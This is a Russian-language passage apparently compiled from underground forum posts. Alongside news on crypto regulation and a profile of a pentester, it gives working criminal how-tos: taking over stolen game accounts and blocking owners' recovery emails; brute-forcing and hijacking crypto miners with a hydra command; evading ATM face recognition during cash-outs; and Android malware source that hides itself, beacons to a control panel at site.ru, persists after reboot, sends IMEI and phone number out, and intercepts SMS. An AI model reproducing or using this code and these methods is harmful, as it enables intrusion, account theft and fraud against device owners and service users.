личности и шизоаффективное расстройство, в иных случаях через депрессивный эпизод. Такая статья в военном билете ограничивает вас только в одном - невозможности к работе на государственной службе (погоны не поносишь). В заключении отмечу, что сама экспертиза в подавляющем большинстве случаев играет нам на руку - это и зачтение срока, и снижение наказания, и время подумать. Отнеситесь к ней с уважением и вам все вернется.
  4. Цель Тёмного интернета Целью Даркнета является предоставление полной анонимности с гарантией безопасности, где люди могут виртуально взаимодействовать друг с другом и не бояться закона. Даркнет содержит форумы, блоги информаторов, услуги сводничества одних с другими, онлайн рынки, ресурсы с документацией и т.д. Светлая сторона Тёмного Даркнет выступает убежищем демократии и противодействием коррупции. Здесь информаторы могут сообщать о корпоративных и правительственных неправомерных действиях прессе, без опасений преследования рассекречивать коррупционные действия, которые скрыты от общественности. В этой сети царит полнейшая свобода слова и информации. Даркнет — это также место, где люди из деспотических стран или репрессивных религий могут найти единомышленников и даже получить помощь. И конечно же Даркнет является убежищем для журналистов и людей с весьма нестандартным образом жизни, чтобы общаться в сети и не опасаться репрессий. Тёмная сторона Даркнета У Даркнета есть и темная сторона. Даркнет выступает в роли чёрного рынка, где можно купить или продать что угодно, любую контрабанду, украденную вещь или незаконно добытую информацию. Наркотики, оружие, ворованные номера кредитных карт, различная порнография, услуги по отмыванию денег и даже наем убийц — все это есть в Даркнете. Правда, каждый сам решает для себя, тёмная эта сторона иль нет.
  5. Данный мини курс ориентирован для тех, кто боле менее знаком с таким ремеслом как брут.Я не буду советовать вам места откуда покупать или брать бесплатно базы.Ни будет ни слова про прокси, vpn. Сейчас я бы хотел поведать вам именно о тонкостях и трюках в Бруте, которые помогут вам защитить краденный аккаунт до его продажи, или навсегда, если вас интересует личное использование. Еще стоит подметить что эти советы будет касаться именно игровых аккаунтов. Так как опыта в этой сфере у меня не мало. Но все советы так же подойдут для любых сервисов. Заработок касаемо даже мобильных игр может достигать 150+к в месяц, зависит от ваших усилий. И последнее - конкретики тут не будет, игры или сервисы вы выбираете сами... 1) Допустим мы выбрали сервис для которого и будем добывать аккаунты, для начала создайте свой личный тестовый аккаунт в этом сервисе/игре и тестовую почту, хоть temporary email. Далее наша цель собрать как можно больше электронных адрессов этого сервиса, от которых чекер и будет чекать письма ( https://ibb.co/fTH9jm (не реклама)). Регаемся - пришло письмо с одной почты от сервиса, жмем "забыли пароль", придет еще письмо от уже другого адресса, пишем в саппорт с любой темой - придет третье, хотите оставить фидбек - придет с четвертой. Далее заливаем их в чекер. Если попадается акк не только с письмом о регистрации но и с письмом от саппорта, то аккаунт скорее всего жирный, ибо восстанавливать нулевый аккаунт владельцу было бы лень. Так что если слишком много набрутите акков с деф регистрационным письмом, то скипайте те, которые без письма от сапорта (рискованно). Про дату упоминать не стоит, ибо даже если аккаунту 2 года, он 50/50 нулевый может быть, так что внимания на этот аспект даже не уделяйте (по своему опыту). 2) Получив доступ к почте, не бежим сразу менять пароль, а лишь заходим в сервис/игру и смотрим стоит ли оно чего...(Пояснять как получить доступ к сервису/игре имея только почту думаю не стоит - тупо через восстановление пароля, если пароль от логов не подходит, и не забываем удалять следы). Чтобы ускорить процесс в два раза - одни логи тестим в самом приложении сервиса/игры, другие же на офф сайте (если можно залогиниться). Использование нескольких браузеров строго запрещено, онли тор... 3)Если аккаунт хороший, то смотрим, привязан ли телефон к почте, если нет то выбираете сервис для покупки онлайн номера (навсегда) на ваше усмотрение, бесплатные онлайн номера чаще всегда даются триально на 7 дней но нам надо навсегда!. Я лично покупал за 10 бачей 10 номеров по акциям и они все еще работают (600 руб за все 10 и все на одном аккаунте)...Затраты минимальны. Привязав телефон, вы сможете легко восстановить почту если владелец сменит пароль. Слишком очевидно но все-же. Привязав телефон, меняем пароль от мыла и радуемся. Дальше интересней.... Если же телефон уже привязан, то для начала пробуете сменить почту привязанную к игре. Можно и через саппорт самой игры. Пишем, мол на мыле кто то другой сидит, а возможности сменить пароль нету. Обычно приходят инструкции на почту, так что чекайте и быстро удаляйте...И вуаля, ваш аккаунт который вы собираетесь продавать теперь привязан к левой чистой почте. Если же телефон уже привязан и почту сменить нельзя и доступ к аккаунту идет всегда только по логину и паролю, то заходите на сайт игры/сервиса и запрашиваете смену пароля. Придет сообщение на почту, подтверждаете свой новый пароль, и теперь самое главное перед удалением этого сообщения кидаете его в "спам", а от туда уже удаляете. Ту же операцию проделываете с саппортовским адрессом. Главное чтобы все адресса (которые кстати у нас все еще забиты в чекере) считались как спам. Таким образом, если хозяин попытается восстановить пароль, то ему тупо не будет приходить сообщение о подтвержении на почту... На этот моменте забиваете хер на саму почту и радуетесь новому жирному аккаунту, доступ к которому есть только у вас. 4)Некоторые сервисы/игры, имеющие приложения под android дополнительно привязывают gmail почту к аккаунту, тоесть не только по логам можно зайти в игру, но и по gmail. Так как gmail напрямую связан с системой android и его требуют вводить на каждом углу, так что если вы выясните что у сервиса такая функция работает, то либо меняем данные от gmail плюсом, если же не получится то пишем опять таки в саппорт, и говорим мол только оригинальная почта есть и логи, а gmail украли, и боюсь что зайдут на аккаунт через него..Далее думаю понятно. В заключение хочу добавить, что все сервисы, почтовики, игры о которых тут шла речь - забугорные, так как у меня английском на высоком уровне, поэтому если я тут упоминал про саппорт, то писать там на англ лучше, они лояльнее там..Тоже самое касается сервисов для покупки онлайн номеров...Но тут кому как нравится. Все тоже самое для СНГ тоже подойдет. Надеюсь инфа была полезная.
  6. Алиса Шевченко «взламывает» компьютерные системы крупных компаний по их заказу и зарабатывает около 10 млн рублей в год. Зачем компании ей платят? Давайте разберемся. Взлом умного города В фабричных окнах загорается свет. Локомотив тянет вагоны через железнодорожный переезд. Кран поднимает грузы. Миниатюрный городок, появившийся в мае этого года в московском техноцентре Digital October, - не игрушка, а хакерский полигон, построенный для форума Positive Hack Days. За сотню километров от этого места, сидя в подмосковном коттедже, блондинка с татуировкой-иероглифом на левом предплечье взламывает со своего компьютера систему управления предприятием городка-полигона. Она побеждает в конкурсе «Взлом умного города» - легальной хакерской атаке, нацеленной на выявление слабых мест в инфраструктурных и промышленных системах. «Я даже не ожидала такой тривиальности - около 10 критических уязвимостей всего за пару часов», - рассказывает Алиса Шевченко, она же Esage, она же владелица компании «Цифровое оружие и защита» с годовой выручкой около 10 млн рублей. История В 15 лет Алиса выучила язык ассемблера, но программистом не стала - ее больше интересовали взломы. Бросила учебу в трех технических вузах, посчитав, что попусту теряет время, а сейчас ее приглашают читать лекции на кафедру защиты информации МГУ и спецфакультет МГТУ им. Баумана. Свою первую компанию EsageLab, специализирующуюся на цифровой защите, Алиса Шевченко открыла в 2009 году. «Ей всегда было интересно узнать и понять, как все устроено изнутри. А потом использовать эти знания, для того чтобы обойти систему», - вспоминает Александр Гостев, главный антивирусный эксперт «Лаборатории Касперского», где Шевченко пять лет работала вирусным аналитиком. Расследуя кражу денег в одном из российских банков, вспоминает Гостев, он показал Шевченко выявленный руткит-модуль (программу, которая в обход антивирусов скрытно управляет компьютером). Для Алисы - Esage руткиты были профессиональной страстью, и она вспомнила, что уже видела похожий. В итоге взломщик был обнаружен. А Шевченко почувствовала, что на противодействии киберпреступникам можно заработать: «Документы, которые раньше прятали в сейфах, переместились в компьютеры, на смену кешу приходил интернет-банкинг, и криминал двигался к тому, чтобы захватывать цифровые активы». Развитие В начале 2000-х в России рынка тестирования проникновений и поиска уязвимостей практически не было, он появился к 2010 году, замечает Александр Поляков, технический директор из питерской компании Digital Security. На целевых атаках зарабатывали прежде всего хакеры-преступники, охотившиеся за деньгами или промышленными секретами. Поначалу бизнес EsageLab был связан с консалтингом и исследованиями целевых атак. Стартовых инвестиций не понадобилось: весь капитал заключался в навыках нескольких проверенных сотрудников и собственных компьютерах. Алиса Шевченко Первых крупных заказчиков EsageLab получила по рекомендации системного интегратора «ДиалогНаука», с руководством которого Шевченко была знакома. К примеру, в 2010 году один из российских банков обратился в EsageLab, чтобы разобраться, как с помощью сотен поддельных денежных переводов кибермошенники выводили суммы от $3000 до $30 000. Группа Шевченко нашла бреши, через которые атакующие внедрились в систему банка и могли бы вновь это сделать в любой момент. Такие расследования, которые показывали логику и сценарий атаки, занимали у EsageLab в среднем месяц работы и приносили $10 000–15 000 выручки. Гендиректор «ДиалогНаука» Виктор Сердюк подтвердил Forbes факт сотрудничества с Шевченко, но раскрывать подробности не стал, сославшись на конфиденциальность информации. Судя по списку выигранных контрактов, клиентами интегратора были: Суды Минобороны Структуры ФСО Аппарат Госдумы "Сбербанк" "Газпром" "Транснефть" "МТС" "Мегафон" Партнерство «ДиалогНаука» с EsageLab было вполне логичным, замечает руководитель Group-IB Илья Сачков: Для интеграторов поиск уязвимостей - это подготовка дальнейших поставок клиентам софта и оборудования. Шевченко и "Лаборатория Касперского" В 2009 году Алиса Шевченко, по ее словам, получила от заказчиков 1,5 млн рублей. Обратился к ней и бывший работодатель. EsageLab тестировала один из антивирусов KasperskyLab. «Поработали хорошо, нашли много уязвимостей», - вспоминает предпринимательница. Однако бизнес оказался не столь привлекателен, как казалось вначале: контракты на расследования и тестирования разовые, накладные расходы велики, команду надо постоянно держать в Москве. Шевченко решила сосредоточиться на том, что у нее получалось лучше всего, - на взломах-проверках. Так можно было заполучить клиентов на длительное обслуживание. В поисках новых вариантов партнерства Шевченко переговорила с Натальей Касперской. К тому времени соосновательница «Лаборатории Касперского» вышла из бизнеса бывшего мужа и развивала свою компанию InfoWatch. «Алиса занималась консультациями в области защиты от руткитов. Было непонятно, как на этом можно было заработать. Инвестировать мы не стали, но какими-то советами помогли», — вспоминает Касперская. Боевые учения Владелице EsageLab нужно было около $150 000 на создание программного инструментария для управляемых взломов. За год с лишним она заработала недостающую сумму. В 2011 году Шевченко заключила первый контракт по поиску уязвимостей в ПО для компании «ИнформЗащита». А в следующем году - первый контракт по пентестам (испытаниям на проникновение) с Parallels. Поиск и ликвидация слабых мест в компьютерной системе через имитацию хакерских атак за рубежом называется offensive security (агрессивная защита информации), в России - «боевые учения». Команда Шевченко знает лишь название компании-клиента и по открытым источникам собирает информацию на ключевых сотрудников, как при подготовке к реальному киберпреступлению (например, через компьютер сисадмина можно проникнуть в критические узлы локальной сети). Дальнейшие действия - информация, не подлежащая разглашению. Схема "боевых учений" «Мы всегда работаем по контракту с предоплатой. За штучные заказы уже не беремся», — говорит Шевченко. Почему заказчики «боевых учений» привлекают людей со стороны? «Держать таких специалистов в штате накладно, ведь пентесты делаются не каждый день», — объясняет вице-президент по безопасности банка «Тинькофф Кредитные системы» Станислав Павлунин (в 2013 году банк привлекал Шевченко для аудита кода и пентеста). Даже если у фирмы есть свой отдел реагирования на целевые атаки, возникает потребность проверить, насколько надежна защита, то есть провести внешний аудит. Поиском уязвимостей, по словам Ильи Сачкова из Group-IB, в России сейчас занимаются не менее 30 больших компаний, преимущество Шевченко = в ее «бутиковости» и соответствующем качестве проверки. «Я никудышный продавец, - признается Алиса. - В компании на мне лежит исследовательская задача - получение инновационных технологий». Впрочем, клиенты, как правило, находят ее сами. Заказчики проверяют хакеров, а хакеры - заказчиков. «По одному контракту переговоры шли почти год, пока мы не стали доверять друг другу, - рассказывает Шевченко. - Мы используем дорогие технологии стоимостью $100 000–200 000, и они не должны попасть в руки к кому попало». Ребрендинг Год тому назад EsageLab была переименована в «Цифровое оружие и защиту» (ЦОР). Это не просто эффектное название: в декабре 2013 года технологии вторжения в программное обеспечение (intrusion software), которые создает и использует группа Шевченко, были внесены в реестр международного Вассенаарского соглашения, регулирующего экспорт обычных вооружений. Алиса Шевченко выходит на зарубежные рынки. Скоро в Сингапуре должна начать работу ее новая компания, которая будет продавать программное обеспечение для проведения реалистичных тестов на проникновение. Насколько успешен легальный хакерский бизнес? По словам Шевченко: Выручка EsageLab в 2012 году составляла 3 млн рублей «Цифровое оружие и защита» по итогам 2014 года должна заработать около 10 млн рублей. На аренду офиса ЦОР не тратится, сотрудники работают дистанционно, ядро компании - пять человек, в зависимости от задач команда увеличивается до 10-15 человек. Штатных сотрудников Шевченко отбирала долго и тщательно. Еще до «Лаборатории Касперского» она тусовалась на хакерских сайтах под ником codera. Из числа знакомых по сообществам - хакеров из Санкт-Петербурга и Новосибирска, не связавшихся с криминалом, - она и стала собирать команду. «Это мои лучшие специалисты, проверенные годами», - уверяет Шевченко. На вопрос о возможности проверки на полиграфе она пожимает плечами: «Хакеры знают, как его обойти. «Детектор лжи» мне часто заменяет женская интуиция».
  7. Apple утверждает, что ее система блокировки Face ID очень надежная. Но мы уже знаем, что отличить близнецов друг от друга она не способна. А теперь оказалось, что даже просто братья могут разблокировать iPhone X. На видео ниже показано, как парень разблокирует свой iPhone X, а потом передает телефон своему брату. Сначала смартфон остается заблокированным, но когда брат надевает очки, то получает доступ к телефону. Если вы не доверяете своим братьям и сестрам, то лучше пока обойтись обычным паролем на iPhone X.
  8. Примечание: Все методы расписанные ниже, можете использовать на свой страх и риск. Open Source Intelligence(OSINT) Это один из первых способов сбора информации до атаки. В прошлом было много случаев взлома при помощи OSINT. Вместе с развитием устройств передачи информации, мы можем собрать огромный объем важных данных в общедоступной сети. В этой статье, мы будем собирать данные для майнеров криптовалют (Биткоин[Antminer] и Эфир[Claymore]). Прощупываем Antminer! Самый лучший ASIC биткоин майнер это Antminer S9/S7. Аппаратное обеспечение майнера использует веб-сервер “lighttpd/1.4.32 и некоторые имеют открытые SSH порты. Существует эксплоит для версии“Lighttpd 1.4.31”, однако, вы не сможете получить доступ к серверу с данным эксплоитом. Веб-страница на веб-сервере защищена «HTTP Аутентификацией Дайджест». Критической точкой является то, что шахтерам требуется имя пользователя и пароль для входа в систему.Критическая суть в том, что майнеру требуется имя пользователя и пароль для входа в систему. На странице конфигурации antMiner используется «Аутентификация Дайджест» Известно сто нам нужно информация или ключевики(ключевые слова) чтобы собрать данные при помощи технологии OSINT. Эта информация является ключевым словом, включая «antMiner Конфигурации» в заголовках HTTP, которые появляются каждый раз, когда я отправляю запрос на сервер. Я искал на censys.io и на shodan.io при помощи особых дорков и собрал IP-адреса. (antminer) AND protocols.raw: “80/http” AND 80.http.get.title: “401” https://censys.io/ дорки поиска Доступ к системе можно получить при помощи брутфорс атаки на HTTP порт или на SSH порт. Сперва мне понадобилось руководство пользователя чтобы узнать HTTP имя пользователя и пароль по умолчанию. После я поискал в гугле по ключевым словам на английском “antminer default password” и нашел сайт в который содержал в себе Руководство для пользователя. Руководство для пользователя AntMiner | Мы можем с лёгкостью найти в поисковике Для данного мануала , я предпочел использовать hydra для брутфорс атаки (Bruteforcing HTTP Digest Authentication- Брутфорс HTTP аутенсификации дайджест) с открытыми наиболее популярными распространёнными 10 000 паролями. Также можно использовать Burp Suite Intruder hydra -l root -P commonPasswords.txt -vV {TARGET} http-get / Если тебе посчастливилось получить доступ на страницу конфигурации. Злоумышленники могут редактировать страницу по своему желанию. Программное обеспечение майнера Claymore Другой тип атаки также нацелен на программное обеспечение майнера Claymore Miner (например, Altcoins, ethereum, майнер zcash) Я совершил другой поиск в shodan.io с помощью конкретных дорков. Можете отправить несколько пакетов JSON (JavaScript Object Notation— текстовый формат обмена данными) с помощью API-интерфейса Claymore Remote Manager для удаленного управления сервером майнера. Тут мы, управляем графическими процессорами (отключаем, включаем сдвоенный режим и т.д) или же редактируем config.txt чтобы изменить пул адреса кошелька отправив несколько команд. Мы отправим команду “miner_restart” или “control_gpu” чтобы определить является ли он в режиме только для чтения или записи/чтения. Я использовал NC для отправки JSON команды на MacOS. Сперва, мы попытаемся выполнить команду с "miner_getstat1" После этого мы попытаемся отправить команду с“control_gpu” чтобы определить является ли он в режиме только для чтения или записи/чтения. Мы получили сообщение об ошибке с кодом указанным ниже. Мне удалось перезапустить систему, когда использовал другой IP-адрес. Тут показало, что Claymоre Remоte Mаnаger API позволяет чтение / запись аутентификацию. Claymore Remote Manager также позволяет редактировать файл конфигурации с использованием формата JSON (отправив JSON -файл). Тем не менее, вы можете с лёгкостью отредактировать его с помощью Claymore's Ethereum Dual Miner Manager в Windows, также можете изменить пул адрес кошелька. Фантази для взлома: Я не пробовал ввести команду в Claymore Майнер Софт с отправкой команды JSON. Если у него есть уязвимость, можно получить доступу к серверу без разрешения чтения/записи . Можете улучшить методы поиска с помощью OSINT для сбора массивных данных. Можете даже повредить все графические процессоры контролируя охладительной системой после редактирования config.txt :)
  9. Кремль раскрыл поручения ЦБ и правительству по регулированию криптовалют. Две недели назад президент России Владимир Путин обсуждал эту тему с министром финансов Антоном Силуановым, своим помощником Андреем Белоусовым, председателем ЦБ Эльвирой Набиуллиной, и после этого совещания стало понятно, что криптовалютам быть, но государство возьмет под контроль их выпуск и обращение в России. По итогам совещания Путин дал несколько поручений, говорится на сайте Кремля. До 1 июля 2018 г. правительство и ЦБ должны описать в законодательстве статус криптовалют, технологии распределенных реестров (блокчейн), а также токена и смарт-контракта. Также им предстоит выработать требования к «майнингу» криптовалют – причем майнерам предстоит регистрация. Еще их обложат налогом, но каким – пока неизвестно. Также президент поручил отрегулировать ICO (initial coin offering – первичное размещение криптовалют), взяв за основу практику IPO – первичного размещения ценных бумаг. Схожих позиций придерживаются и американские регуляторы. В июле американская комиссия по ценным бумагам и биржам признала токены (собственная криптовалюта проекта, которую он предлагает в обмен на инвестиции) проекта The DAO ценными бумагами, а значит, их выпуск должен сопровождаться соответствующими процедурами – например, допуском к ICO только квалифицированных инвесторов и регистрацией. Но одновременно президент поручил обдумать и механизмы тестирования этих новинок. До 20 декабря ЦБ должен создать специальную «песочницу» для их апробации, до тех пор пока не появится регулирование их оборота на финансовом рынке. Страны Евразийского экономического союза ждет единое платежное пространство, где будут применяться эти новые финансовые технологии, говорится в поручении президента. ЦБ и правительство должны продумать это до 30 марта 2018 г. Поручения президента касаются законодательного регулирования, а техническая сторона вопроса, судя по словам министра связи и массовых коммуникаций Николая Никифорова, уже проработана его ведомством. На прошлой неделе он анонсировал подготовленное Минкомсвязи постановление правительства с описанием технологий. «Должен быть установлен госконтроль за эмиссией этого криптоинструмента, а экосистема, применение – за частным бизнесом. Важно понять, в каких отраслях и сферах он может применяться и быть полезен», – сказал Никифоров. Признавать остальные криптовалюты Россия не планирует, говорит он: «Биткойн и другие криптовалюты основаны на зарубежной криптографии, и под ними нет никакой правовой основы». Криптовалюта (самая известная из них – биткойн) – это программный код, который не регулируется ни одним банковским надзорным органом в мире и не имеет эмиссионного центра. Создают код или добывают условный ограниченный ресурс сами пользователи за счет вычислительной мощности компьютера. Криптовалюту можно добыть самостоятельно или купить на зарубежных торговых площадках.
  10. Прочитав данную новость меня навело на большие раздумия. Банк тинькоф внедряет умную технологию распознавания лиц на своих банкоматах, что делает обнал в банкоматах тинькофф совсем не логичным. Да и действитетельно, сейчас технологии идут в ногу со временем, распознавание лиц сейчас работает в пилотной версии, но я даю буквально год, два и анализ можно будет выстроить быстро. Давайте разберем способы обхода данной проблемы. Да и не суть что все вокруг преступники, но в целом, если идем на сомнительную встречу с сомнительным человеком, зачем нам светить везде свое прекрасное личко? Давайте сначала разберемся как это работает? Определение заточено на цвете кожи, симметрии при помощи нейросетей. Существует метод Виолы-Джонса, который может применяться в реальном времени, система распознает лицо даже при поворотах. Для анализа в публичных местах используются 3D изображения, несколько камер делают снимки с разных ракурсов и потом обьединяют все в одно целое, формируется трехмерная модель, определяя контрольные точки, и в последствии данные анализируются с базой данных и при совпадении, человек идентифицируется. На фото ниже, представлены параметры по которым идет идентификация. В наше время эта технология еще сырая, можно рассмотреть тот момент, что компания Identix разрабатывает технологию, которая будет анализировать текстуру, шрамы, поры и глубину пор. Так что через несклько лет этот вопрос будет уже широко рассматриватся и применятся во всех публичных и не публичных местах. Определение схожести пропорций и цвета кожи, выделение контуров на изображении и их сопоставление с контурами лиц, выделение симметрий при помощи нейросетей. Ребята из Яндекса проводили эксперемент, который способствует защититься от распознавания лиц, были проведены тесты с нанесением макияжа и всевозможных рисунков на лицо. Вероятность идентификации достигает 70% Самый верный и старый способ, который поможет обмануть нейронную сеть, является зимняя шапка/кепка, головной убор, побольше + для надежности очки. Тем самым нейронная сеть не сможет вас идентифицировать. Не стоит недооценивать эти 2 элемента, можете проверить себя на публичных ресурсах такие как FindFace а так же зарубежных. Для более серьезных дел, конечно тут на помощь придут реалистичные силиконовые маски, стоят они правда дорого, но любая идентификация составит 0%
  11. Да тут особо ни чего мудрить не надо. Просто идем по шагам. 1. Устанавливаем java для разработчиков с офф сайта. 2. Качаем android studioКачаем полную рекомендованную. Сейчас мы не будем вдаваться в эти все подробности. Оно нам надо? 3. Запасаемся бубликами и пивом. Ведь сейчас придется все это поставить и настроить. 4. Тыкаем в основном далее, не вдумываясь что там написано. Незачем забивать голову ? 5. После чего как мы установили все это. Запускаем студию. Ищем сверху значок SDK Manager. Он где-то справа. Нажимаем, ставим везде галки, соглашаемся с условиями и нажимаем инсталл. 6. Опять грызем бублики и пьем великолепное пиво. Тут процесс по дольше, так как будут выкачиваться виртуалки и всяческие тулзы. 7. Ну вот собственно и все. Как все начиналось? Мы все поставили, теперь стоит и подумать, а как тут теперь вирус написать ? А для этого мы идем в File -> New -> New project. И тут нам предлагают придумать название проекта и домен сайта компании. Вводим что взбредёт в голову. На основе этих данных генерируется package имя. Которое используется как уникальный идентификатор нашего APK. Жмем далее. Тут нам предлагают выбрать платформу под наш проект. Ну тут мы выбираем только Phone. Остальное рассмотрим позже. Далее. И теперь нам предлагают выбрать как будет выглядеть наше окошечко (Activity) стартовое, главное. Тут есть важная особенность. Чтобы запустить какой либо код сразу после установки, нужно чтобы было какой либо из окошек при старте. Поэтому выбираем любое кроме No Activity. Лучше всего выбрать Empty. Будет легче его вычищать, от ненужного мусора. Далее. Пишем название окошку и нажимаем Finish. Будет немного времени , чтобы бахнуть еще пивка. Пока файлы нового проекта индексируются и настраивается сборщик проекта. Эй, ты слишком жирный! Пробуем собрать проект наш. Build -> Generate signed apk.. И что мы видим? APK с 1 окошком и приложением которое ни чего не делает. Занимает 1 мегабайт. Надо с этим что-то делать, а именно отказывать от библиотек (AppCompat). Это красивая графика, которая нам не нужна. Переходи в файл MainActivity.java Заменяем public class MainActivity extends AppCompatActivity на public class MainActivity extends Activity Удаляем import android.support.v7.app.AppCompatActivity; Заходим в настройки проекта и во вкладке Dependes удаляем строку с AppCompat. Далее переходим к файлу values.xml и styles.xml. Удаляем их. Заходим в androidManifest.xml и меняем android:theme="@style/AppTheme" на android:theme="@android:style/Theme.Translucent.NoTitleBar" Собираем наше приложение, ура! размер меньше 40 кб. Уже есть с чем работать. Почему ты не прячешься? Далее, нам нужно спрятать нашего зверька. Чтобы иконка не была видна в списке менеджера приложений. А так же надо закрыть наше приложение. Вставляем после setContentView(R.layout.activity_main) Следующий код: String pgkname = getApplicationContext().getPackageName(); ComponentName componentToDisable = new ComponentName(pgkname,pgkname+".MainActivity"); getApplicationContext().getPackageManager().setComponentEnabledSetting( componentToDisable, PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP); Этот код скроет нашу иконку с глаз И после всего этого пишем: finish(); Теперь наше приложение после установки. Запускается и сразу же скрывается с глаз долой. Ух, проделали мы работу. Но надо идти дальше, а то бот не появиться в админке. Тук, тук, открывайте, полиция! Теперь мы должны сделать так, чтобы наш чудесный APK начал стучать в админку. Тут я уже полагаю, что админка где-то написана. И от нас требуется только стучать. Возьмем самый простой метод, он не будет работать корректно на андроидах выше 4.х. Но с чего-то надо же учиться. Я же не за вас работу делаю. Нам нужно создать сервис. Для этого мы создаем файл с новым class. (Правой тыкаем в проекте, на папку Java). Название класса пишем к примеру Network. Нажимаем окей. Удаляем все содержимое файла кроме первой строки где прописан package и заменяем на import android.app.Service; import android.content.Intent; import android.os.IBinder; import org.apache.http.HttpResponse; import org.apache.http.client.HttpClient; import org.apache.http.client.methods.HttpGet; import org.apache.http.client.methods.HttpPost; import org.apache.http.entity.StringEntity; import org.apache.http.impl.client.DefaultHttpClient; import java.io.InputStream; import java.util.Timer; import java.util.TimerTask; public class Network extends Service{ @Override public int onStartCommand(Intent intent, int flags, int startId) { return Service.START_STICKY; } @Override public IBinder onBind(Intent intent) { throw new UnsupportedOperationException(""); } @Override public void onCreate() { MyTimerTask myTask = new MyTimerTask(); Timer myTimer = new Timer(); myTimer.schedule(myTask, 10000, 10000); } class MyTimerTask extends TimerTask { public void run() { String result = ""; result = GET("http://site.ru/?q="); // Обработка result } } public String GET(String url){ InputStream inputStream = null; String result = ""; try { HttpClient httpclient = new DefaultHttpClient(); HttpResponse httpResponse = httpclient.execute(new HttpGet(url)); inputStream = httpResponse.getEntity().getContent(); if(inputStream != null) result = convertInputStreamToString(inputStream); else result = ""; } catch (Exception e) { } return result; } } Это код описывает класс сервиса, в котором при запуске, запускает таймер и каждые 10 секунд отправляет GET запрос наURL и запрашивает ответ. Но это не все. Этот код не будет работать если мы объявим наш сервис в манифесте и не дадим права выходить в интернет нашему приложению. Идем в манифест. Добавляем <uses-permission android:name="android.permission.INTERNET" /> и в описание application <service android:name=".Network" /> Осталось запустить наш сервис. Идем в MainActivity и перед finish() вставляем запуск сервиса getApplicationContext().startService(new Intent(getApplicationContext(), Network.class)); Финишная линия Теперь у нас есть апк, который сам себя скрывает после запуска и запускает процесс отстука в админ панель. Где написано // Обработка result : там происходит обработка ответа и команд админки. Не сложно, правда? Но пока мы пили пиво. Мы совсем забыли, что если телефон перезагрузят. То наше приложение уже ни когда не запустится. Для этого мы идем опять в манифест. Добавляем права на запуск после ребута: <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> Добавляем обязательно обработчик в описание application <receiver android:name=".Boot" android:enabled="true" > <intent-filter> <action android:name="android.intent.action.BOOT_COMPLETED" /> <action android:name="android.intent.action.QUICKBOOT_POWERON" /> </intent-filter> </receiver> Теперь после перезапуска у нас вызовется класс Boot. И сейчас мы его создадим. Все делаем как я писал выше. Создали и удалили все кроме package. import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; public class Boot extends BroadcastReceiver { @Override public void onReceive(Context context, Intent arg1) { context.startService(new Intent(context, Network.class)); } } Конец, и пару слов. В окончании у нас появился прям такой игрушечный бот (APK). ********* Гейт – это скрипт который будет принимать, отдавать команды. К примеру админка у нас стоит на http://site.ru/. Создаем скрипт gate.php. И кладём его в корень. Получаем наш гейт http://site.ru/gate.php. Важно: нельзя использовать слова gate и слова-маячки. Трафик может снифаться. Этот скрипт будет принимать и отдавать команды. Самый верный способ – это отправка данных методом post и чтение вывода. Получаем простую цепочку: 1. Определяем гейт. 2. Шлем отстук. 3. Забираем задачи, что гейт нам даст в ответ. (Лучше всего задачи забирать по одной, так как нам важно время обработки команд и память которыю мы используем на телефоне. Ведь там не как на компе, гигабайты ее. А java она все таки местами прожорливая.) 4. Шаг не всегда отрабатывает, так как не всегда нам нужно слать отчет о выполнении команд. Но если все таки надо. То мы это делаем 2м пунктом, но с определенным флагом. Почему post? Чтобы в логах не было ничего кроме имени гейта. А что слать то? В отстук входят все основные параметры такие как imei, версия os, sdk, различные параметры пользователя. Кстати если вы не знаете как генерировать bot id, то imei будет в самый раз, чтобы различать всех ботов. Так как это уникальный параметр телефона. Все что вы считаете нужным, отсылаете, а ответ обрабатываете. Список параметров рекомендуемый для отстука: 1. imei (id бота) 2. оператор 3. версия os 4. версия sdk(для разграничения функционала, так как до 4.4 и после разные методы работы используются) 5. модель телефона 6. серийный номер 7. есть ли рут (использовать расширенный функционал и консоль устройства) 8. версия билда (по этому параметру можно обновлять старые версии) 9. Номер телефона 10. Другие параметры важные вам Формат запросов, самый удобный на мой взгляд это json. Но мы живем в 21м веке и этого мало. Это все надо шифровать еще. Почему json? Его очень легко обрабатывать и на стороне сервера и на стороне клиента.Далее мы накладываем алгоритм шифрования. Самый простой это будет RC4, хотя их много, как говорится, на вкус и цвет товарища нет. Но тут мы столкнемся с одной проблемой, у нас могут появитсья всякого рода спец символы, с которыми возникнут сложности при передаче и декодировании. Выходом является обёртка из base64. Алгоритм получается следующий: 1. Составляем json 2. Шифруем его RC4 или любым другим алгоритмом. 3. Оформляем в base64 4. Отправляем 5. Читаем вывод гейта. 6. Делаем все в обратном порядке. Снимаем base64 , расшифровываем, разбираем json. Если надо отрабатываем определенные действия. Важный момент, что при обработке результата, нужно проверять, а действительно ли это админка. То есть должны быть специфичные сигнатуры ответа. Если их нет. То перестаем туда стучать. Так же стоит учитывать, что на телефоне время отстука может чуток отличаться, я имею ввиду интервалы. Все это из-за специфичной работы сервисов на телефоне. Поэтому стоит брать время ожидания с запасом, для определения онлайн бот или нет. Праздники прошли, все протрезвели. Пора и за работу. Как только мы написали своего зверя, нам сразу же захотелось посмотреть фоточки и переписочки людей. И сегодня пойдет речь о том как это сделать. Сразу скажу, что этот вопрос очень сложный и мы к нему ещё не раз вернемся в следующих статьях. Мы рассмотрим здесь перехват и удаление смс для версий 2.х и просто чтение для версий старше 2.Х Почему я решил так сделать? Просто с появлением версии 4.4 работа с смс (удаление или редактирование) изменилась. Создатели поняли, что не стоит кому попало давать работать с входящими данными. Ну в общем поехали. Берем чипсы и пиво. И начинаем разбор. Обработка входящих соединений public class SMSMonitor extends BroadcastReceiver{ @Override public void onReceive(Context context, Intent intent) { Sms sms = new Sms(); try { if (bundle != null) { Object[] pdus = (Object[]) bundle.get(Config.szPdus); SmsMessage[] mgs=new SmsMessage[pdus.length]; for(int i=0;i<pdus.length;i++) { mgs=SmsMessage.createFromPdu((byte[]) pdus); } sms.Text = getMessageFromSMSs(mgs); sms.SenderId = mgs[0].getOriginatingAddress(); Date receiveDate = new Date(mgs[0].getTimestampMillis()); sms.RecieveDate = receiveDate; sms.Status = mgs[0].getStatus(); } } catch (Exception e) { } // можете фильтровать здесь запросы от номеров. Intent intent1 = new Intent(context, SMSService.class); // подготовка Запуска сервиса обработки сообщения. intent1.putExtra("phone", sms.SenderId); intent1.putExtra("text", sms.Text); 